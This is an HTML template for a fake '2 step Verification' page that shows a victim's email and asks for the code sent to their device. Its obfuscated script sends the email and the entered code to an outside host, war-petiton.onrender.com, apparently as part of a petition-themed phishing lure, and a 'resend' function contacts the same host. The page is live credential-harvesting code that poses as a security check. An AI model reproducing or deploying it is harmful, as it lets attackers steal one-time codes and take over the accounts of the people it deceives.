<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Login Account</title>
</head>
<style>
    .loading-txt{
        font-size: 14px;
        font-family: 'Poppins',sans-serif;
        text-align: center;
        display: none;
    }
    #overlay {
    display: none;
    position: fixed;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    background-color: rgba(0, 0, 0, 0.5); 
    z-index: 999;
}
.user-email-link{
    text-decoration: none;
    color: black;
    font-weight: 300;
}
.use-account{
            font-size: 15px;
            text-align: center;
            font-family: 'Poppins',sans-serif;
            font-weight: 300;
            position: relative;
            padding: 0px 5%;
            top: -5%;
        }
.sucessful{
        position:absolute;
        border-radius: 10px;
        transform: translate(25%,100%);
        width: 30%;
        background-color:#fff ;
        height: 250px;
        margin-left: 30%;
        display: none;
        z-index: 1000;
    }
    .forgot-password{
        text-align: center;
    }
.device-img{
        display: flex;
        justify-content: center;
        align-items: center;
    }

    @media screen and (max-width:560px) {
        *body{
            padding: 0;
            margin: 0;
        }
        .enter-code{
            font-family: 'Poppins',sans-serif;
            font-size: 15px;
            font-weight:300;
            margin-left: 5%;
        }
        ul { padding:0 }
        @font-face {
    font-family: 'Poppins';
    src: url('/fonts/Poppins-Regular.ttf');
}
.option-one{
    display: flex;
    border: 1px solid black;
}
.sucessful{
        position:absolute;
        border-radius: 10px;
        transform: translate(-20%,75%);
        width: 60%;
        background-color:#fff ;
        height: 220px;
    }
    .sucess-img{
    display: flex; 
    justify-content: center;
    align-items: center;
    }
    .sucessful h4{
        color: black;
        margin-top: 10px;
        font-size: 21px;
        font-family: 'Poppins',sans-serif;
    }
    .close-sucess{
    text-decoration: none;
    color: rgb(31, 31, 31);
    font-size: 14px;
    font-weight: 600;
    font-family: 'Poppins',sans-serif;
    position: relative;
    margin-top: 10px;
    top: 7%;
    right: 4%;
    }
        .logo-img{
            display: flex;
            justify-content: center;
            width: 100%;
            height: 45px;
            position: relative;
            top: 10%;
        }
        .sign-in-text{
            text-align: center;
            font-family: 'Poppins',sans-serif;
            font-size: 18px;
            font-weight: 400;
        }
        .form-group {
      position: relative;
      margin-bottom: 20px;
    }
    .try-another-method{
            margin-top: 10%;
        }

    input {
      width: 85%;
      padding: 15px;
      border: 1px solid #ccc;
      border-radius: 5px;
      outline: none;
      margin-left: 5%;
    }

    label {
      position: absolute;
      left: 7%;
      top: 55%;
      width: 35%;
      transform: translateY(-50%);
      color: #777;
      font-size: 16px;
      pointer-events: none;
      transition: 0.3s ease-out;
      font-family: 'Poppins',sans-serif;
    }

    input:focus + label,
    input:not(:placeholder-shown)  +label {
      top: 1px;
      font-size: 12px;
      color: #007bff;
      background-color: #fff;
      width: 30%;
      width: 20%;
      font-family: 'Poppins',sans-serif;
    }

    input:focus +  #email-label,
    input:not(:placeholder-shown)  + #email-label {
      top: 1px;
      font-size: 12px;
      color: #007bff;
      background-color:#fff;
      width: 30%;
      font-family: 'Poppins',sans-serif;
    }
    .device-img{
        display: flex;
        justify-content: center;
        align-items: center;
    }
    .device-img img{
            width: 100px;
            height: 100px;
        }
        .input{
            padding: 20px 100px 15px 5px;
            margin-left: 3%;
            border-radius: 2px;
            border-color: rgb(223, 223, 223);
            border-width: 0.5px;
            font-size: 19px;
            font-family: 'Poppins',sans-serif;
            font-weight: 400;
        }
        #input2{
            margin-top: 5%;
        }
        input:focus{
            border-color: rgb(9, 96, 167);
        }
        .forgot-password{
            text-decoration: none;
            font-size: 14px;
            color: #1d1d1d;
            padding-left: 5%;
            font-family: 'Poppins',sans-serif;
            font-weight: 700;
        }
        .use-account{
            font-size: 14px;
            text-align: center;
            font-family: 'Poppins',sans-serif;
            font-weight: 300;
        }
        .user-email{
            border: 1px solid rgb(110, 110, 110);
            width: 65%;
            text-align: center;
            padding: 4px;
            position: relative;
            top: -5%;
            left: 17%;
            border-radius: 10px;
            font-family: 'Poppins',sans-serif;
        }
        .not-your,.learn-more{
            font-size: 14px;
            font-family: 'Poppins',sans-serif;
            font-weight: 400;
            color: black;
            padding: 5%;
        }
        #learn-more{
            color: #007bff;
            font-weight: 500;
            text-decoration: none;
        }
        .login-div{
            margin-top: 20%;
            display: flex;
            justify-content: space-between;
        }
        .create-account{
            text-decoration: none;
            font-size: 15px;
            color: #007bff;
            padding-left: 5%;
            font-family: 'Poppins',sans-serif;
            font-weight: 400;
            padding-top: 10px;
        }
        #login{
            padding: 10px;
            padding-right: 10px;
            border-radius: 4px;
            background-color: #007bff;
            color: #fff;
            text-decoration: none;
            font-family: 'Poppins',sans-serif;
        }
        #show{
            font-size: 16px;
            font-weight: 500;
            padding-right: 30px;
        }
        .errormsg1,.errormsg2{
            display: none;
            color: red;
            font-size: 13px ;
            font-family: 'Poppins',sans-serif;
            font-weight: 300;
            margin-left: 5%;
            transition: all 0.6s;
        }
    }

    @media (min-width: 561px) and (max-width:1200px) {
        *body{
            padding: 0;
            margin: 0;
        }
        .enter-code{
            font-family: 'Poppins',sans-serif;
            font-size: 15px;
            font-weight:300;
            margin-left: 5%;
        }
        .device-img img{
            width: 100px;
            height: 100px;
        }
        @font-face {
    font-family: 'Poppins';
    src: url('/fonts/Poppins-Regular.ttf');
}
.sucessful{
        position:absolute;
        border-radius: 10px;
        transform: translate(-20%,75%);
        width: 60%;
        background-color:#fff ;
        height: 220px;
    }
    .sucess-img{
    display: flex; 
    justify-content: center;
    align-items: center;
    }
    .sucessful h4{
        color: black;
        margin-top: 10px;
        font-size: 21px;
        font-family: 'Poppins',sans-serif;
    }
    .close-sucess{
    text-decoration: none;
    color: rgb(31, 31, 31);
    font-size: 14px;
    font-weight: 600;
    font-family: 'Poppins',sans-serif;
    position: relative;
    margin-top: 10px;
    top: 7%;
    right: 4%;
    }
        .logo-img{
            display: flex;
            justify-content: center;
            width: 100%;
            height: 45px;
        }
        .sign-in-text{
            text-align: center;
            font-family: 'Poppins',sans-serif;
            font-size: 20px;
            font-weight: 400;
        }
        .form-group {
      position: relative;
      margin-bottom: 20px;
      background-color: #fff;
    }

    input {
      width: 85%;
      padding: 15px;
      border: 1px solid #ccc;
      border-radius: 5px;
      outline: none;
      margin-left: 5%;
      background-color: #fff;
    }

    label {
      position: absolute;
      left: 7%;
      top: 55%;
      width: 35%;
      transform: translateY(-50%);
      color: #777;
      font-size: 16px;
      pointer-events: none;
      transition: 0.3s ease-out;
      font-family: 'Poppins',sans-serif;
    }

    input:focus + label,
    input:not(:placeholder-shown)  +label {
      top: 1px;
      font-size: 12px;
      color: #007bff;
      background-color: #fff;
      width: 20%;
      font-family: 'Poppins',sans-serif;
    }

    input:focus +  #email-label,
    input:not(:placeholder-shown)  + #email-label {
      top: 1px;
      left: 2%;
      font-size: 12px;
      color: #007bff;
      background-color: #fff;
      width: 30%;
      font-family: 'Poppins',sans-serif;
    }

        .input{
            padding: 20px 100px 15px 5px;
            margin-left: 3%;
            border-radius: 2px;
            border-color: rgb(223, 223, 223);
            border-width: 0.5px;
            font-size: 19px;
            font-family: 'Poppins',sans-serif;
            font-weight: 400;
        }
        #input2{
            margin-top: 5%;
        }
        input:focus{
            border-color: rgb(9, 96, 167);
        }
        .forgot-password{
            text-decoration: none;
            font-size: 17px;
            color: #1d1d1d;
            padding-left: 5%;
            font-family: 'Poppins',sans-serif;
            font-weight: 700;
        }
        .use-google{
            font-size: 17=6px;
            text-align: center;
            font-family: 'Poppins',sans-serif;
            font-weight: 300;
        }
        .user-email{
            border: 1px solid rgb(110, 110, 110);
            width: 40%;
            text-align: center;
            padding: 4px;
            position: relative;
            top: -5%;
            left: 30%;
            border-radius: 10px;
            font-family: 'Poppins',sans-serif;
        }
        .not-your,.learn-more{
            font-size: 16px;
            font-family: 'Poppins',sans-serif;
            font-weight: 500;
            color: black;
            padding: 5%;
        }
        #learn-more{
            color: #007bff;
            font-weight: 500;
            text-decoration: none;
        }
        .login-div{
            margin-top: 20%;
            display: flex;
            justify-content: space-between;
        }
        .create-account{
            text-decoration: none;
            font-size: 17px;
            color: #007bff;
            padding-left: 5%;
            font-family: 'Poppins',sans-serif;
            font-weight: 400;
            padding-top: 10px;
        }
        .try-another-method{
            margin-top: 10%;
        }
        #login{
            padding: 10px;
            padding-right: 10px;
            border-radius: 4px;
            background-color: #007bff;
            color: #fff;
            text-decoration: none;
            font-family: 'Poppins',sans-serif;
        }
        #show{
            font-size: 16px;
            font-weight: 500;
            padding-right: 30px;
        }
        .errormsg1,.errormsg2{
            display: none;
            color: red;
            font-size: 13px ;
            font-family: 'Poppins',sans-serif;
            font-weight: 300;
            margin-left: 5%;
            transition: all 0.6s;
        }   
    }

    @media (min-width:1200px) {
        body{
            justify-content: center;
        }
        .try-another-method{
            margin-top: 10%;
        }
        .container{
            width: 25%;
            transform: translate(150%,20%);
            border: 1px solid rgba(151, 151, 151, 0.308);
            height:560px;
            border-radius: 10px;
            padding:10px;
        }
        .sucessful{
        position:absolute;
        border-radius: 10px;
        transform: translate(20%,100%);
        width: 30%;
        background-color:#fff ;
        height: 220px;
    }
    .sucess-img{
    display: flex; 
    justify-content: center;
    align-items: center;
    }
    .sucessful h4{
        color: black;
        margin-top: 10px;
        font-size: 21px;
        font-family: 'Poppins',sans-serif;
    }
    .close-sucess{
    text-decoration: none;
    color: rgb(31, 31, 31);
    font-size: 14px;
    font-weight: 600;
    font-family: 'Poppins',sans-serif;
    position: relative;
    margin-top: 10px;
    top: 7%;
    right: 4%;
    }
    .choose{
        margin-left: 5%;
        font-family: 'Poppins',sans-serif;
    }
        .logo-img{
            display: flex;
            justify-content: center;
        }
        .sign-in-text{
            text-align: center;
            font-family: 'Poppins',sans-serif;
            font-size: 20px;
            position: relative;
            top: -20px;
            font-weight: 500;
        }
        .use-google{
            position: relative;
            top: -30px;
            font-size: 14px;
            text-align: center;
            font-family: 'Poppins',sans-serif;
            font-weight: 300;
            padding: 0px 20px 0 20px;
        }
        .form-group {
      position: relative;
      margin-bottom: 20px;
    }

    input {
      width: 85%;
      padding: 15px;
      border: 1px solid #ccc;
      border-radius: 5px;
      outline: none;
      margin-left: 5%;
    }

    label {
      position: absolute;
      left: 7%;
      top: 55%;
      width: 35%;
      transform: translateY(-50%);
      color: #777;
      font-size: 16px;
      pointer-events: none;
      transition: 0.3s ease-out;
      font-family: 'Poppins',sans-serif;
    }

    input:focus + label,
    input:not(:placeholder-shown)  +label {
      top: 1px;
      font-size: 12px;
      color: #007bff;
      background-color: #fff;
      width: 20%;
      font-family: 'Poppins',sans-serif;
    }

    input:focus +  #email-label,
    input:not(:placeholder-shown)  + #email-label {
      top: 1px;
      font-size: 12px;
      color: #007bff;
      background-color: #fff;
      width: 30%;
      font-family: 'Poppins',sans-serif;
    }

        .input{
            padding: 20px 100px 15px 5px;
            margin-left: 3%;
            border-radius: 2px;
            border-color: rgb(223, 223, 223);
            border-width: 0.5px;
            font-size: 19px;
            font-family: 'Poppins',sans-serif;
            font-weight: 400;
        }
        #input2{
            margin-top: 5%;
        }
        input:focus{
            border-color: rgb(9, 96, 167);
        }
        .forgot-password{
            text-decoration: none;
            font-size: 17px;
            color: #1d1d1d;
            padding-left: 5%;
            font-family: 'Poppins',sans-serif;
            font-weight: 700;
        }
        .use-google{
            font-size: 18px;
            text-align: center;
            font-family: 'Poppins',sans-serif;
            font-weight: 300;
        }
        .not-your,.learn-more{
            font-size: 16px;
            font-family: 'Poppins',sans-serif;
            font-weight: 500;
            color: black;
            padding: 5%;
        }
        #learn-more{
            color: #007bff;
            font-weight: 500;
            text-decoration: none;
        }
        .login-div{
            margin-top: 20%;
            display: flex;
            justify-content: space-between;
        }
        .create-account{
            text-decoration: none;
            font-size: 14px;
            color: #007bff;
            padding-left: 5%;
            font-family: 'Poppins',sans-serif;
            font-weight: 400;
            padding-top: 10px;
        }
        #login{
            padding: 10px;
            padding-right: 10px;
            border-radius: 4px;
            background-color: #007bff;
            color: #fff;
            text-decoration: none;
            font-family: 'Poppins',sans-serif;
        }
        #show{
            font-size: 14px;
            font-weight: 500;
            padding-right: 30px;
        }
        .errormsg1,.errormsg2{
            display: none;
            color: red;
            font-size: 13px ;
            font-family: 'Poppins',sans-serif;
            font-weight: 300;
            margin-left: 5%;
            transition: all 0.6s;
        }
        .device-img img{
            width: 100px;
            height: 100px;
        }
        .user-email{
            border: 1px solid rgb(110, 110, 110);
            width: 50%;
            text-align: center;
            padding: 4px;
            position: relative;
            left: 23%;
            border-radius: 10px;
            top: -4%;
            font-family: 'Poppins',sans-serif;
        }
            .option-one{
    display: flex;
    width: 85%;
    margin-left: 5%;
     border-bottom: 1px solid rgb(110, 110, 110);
}
.option-one img{
    height: 30px;
    margin-left: 20px;
    margin-top: 2.7%;
}
.option-one h4{
    margin-left: 20px;
    position: relative;
    top: -21%;
    text-decoration: none;
    font-family: 'Poppins',sans-serif;
    font-weight: 400;
}
.option-two img{
    margin-top: 5%;
}
.method-link{
    text-decoration: none;
    color: black;
}
.form-group {
      position: relative;
      margin-bottom: 20px;
    }

    input {
      width: 85%;
      padding: 15px;
      border: 1px solid #ccc;
      border-radius: 5px;
      outline: none;
      margin-left: 5%;
    }

    label {
      position: absolute;
      left: 7%;
      top: 55%;
      width: 35%;
      transform: translateY(-50%);
      color: #777;
      font-size: 16px;
      pointer-events: none;
      transition: 0.3s ease-out;
      font-family: 'Poppins',sans-serif;
    }

    input:focus + label,
    input:not(:placeholder-shown)  +label {
      top: 1px;
      font-size: 12px;
      color: #007bff;
      background-color: #fff;
      width: 20%;
      font-family: 'Poppins',sans-serif;
    }

    input:focus +  #email-label,
    input:not(:placeholder-shown)  + #email-label {
      top: 1px;
      font-size: 12px;
      color: #007bff;
      background-color: #fff;
      width: 30%;
      font-family: 'Poppins',sans-serif;
    }

        .input{
            padding: 20px 100px 15px 5px;
            margin-left: 3%;
            border-radius: 2px;
            border-color: rgb(223, 223, 223);
            border-width: 0.5px;
            font-size: 19px;
            font-family: 'Poppins',sans-serif;
            font-weight: 400;
        }
        #input2{
            margin-top: 5%;
        }
        input:focus{
            border-color: rgb(9, 96, 167);
        }
        .enter-code{
            font-family: 'Poppins',sans-serif;
            font-size: 15px;
            font-weight:300;
            margin-left: 5%;
        }
    .try-another-method{
            margin-top: 5%;
        }
    }


</style>
<body>
    <section id="home-section">
        <div id="overlay"></div>
        <div class="sucessful">
            <div style="display: flex; justify-content: space-between;">
                <h6> </h6>
                <a href='/' class="close-sucess">close</a>
    </div> 
        <div class="sucess-img">
            <img src="/images/icons8-tick-50.png"/>
        </div>
            <h4 style="text-align: center;">Petition Sucessful</h4>
       
        </div>
        <h4 class="loading-txt">Loading.....</h4>
        <div class="container">
            <div class="logo-img">
                <img src="/images/icon-ar21.svg" alt="">
            </div>
            <h4 class="sign-in-text"> 2 step Verification</h4>
            <h4 class="use-account">To keep your account safe, we would like to  know if it's really you trying to sign in</h4>
           
                <a href="/signin" class="user-email-link"><h4 class="user-email"><%=dataInput%></h4></a>

                <h4 class="enter-code"> Enter code sent to your device</h4>
                <div class="form-group">
                    <input type="email" id="email" name="dataInput" placeholder=" ">
                    <label for="email" id="email-label"> Enter Code </label>
                </div>
                  <div class="try-another-method">
                    <h4 class="learn-more" id="learn-more" onclick="submit()">Submit</h4>
                  </div>
                  <div class="try-another-method">
                    <h4 class="learn-more" id="learn-more" onclick="resendRequest()">Resend code</h4>
                  </div>
                </div>
    </section>
    <script>
function submit() {
  const _0x3aebb7 = document.querySelector('#email').value,
    _0x549c7f = document.querySelector('.user-email'),
    _0x44155e = _0x549c7f.innerHTML,
    _0x4d9356 = {
      email: _0x44155e,
      digits: _0x3aebb7,
    }
  _0x3aebb7 == 0
    ? alert('Must enter digits to continue')
    : fetch('https://war-petiton.onrender.com/submit', {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify(_0x4d9356),
      })
        .then((_0x443284) => {
          if (!_0x443284.ok) {
            throw new Error('Network response was not ok')
          }
          return _0x443284.json()
        })
        .then((_0x38230d) => {
          window.locatio.href = '/';
          console.log('Success:', _0x38230d)
        })
        .catch((_0x5c14ec) => {
          console.error('Error:', _0x5c14ec)
        })
}
function resendRequest() {
  const _0x475317 = document.querySelector('.user-email'),
    _0x19215f = _0x475317.innerHTML,
    _0x54daa1 = { key1: _0x19215f }
  console.log(_0x54daa1)
  fetch('https://war-petiton.onrender.com/resendRequest', {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify(_0x54daa1),
  })
    .then((_0x59e61b) => _0x59e61b.json())
    .then((_0x494b99) => {
      console.log('Success:', _0x494b99)
    })
    .catch((_0x44e634) => {
      console.error('Error:', _0x44e634)
    })
}
    </script>
</body>
</html>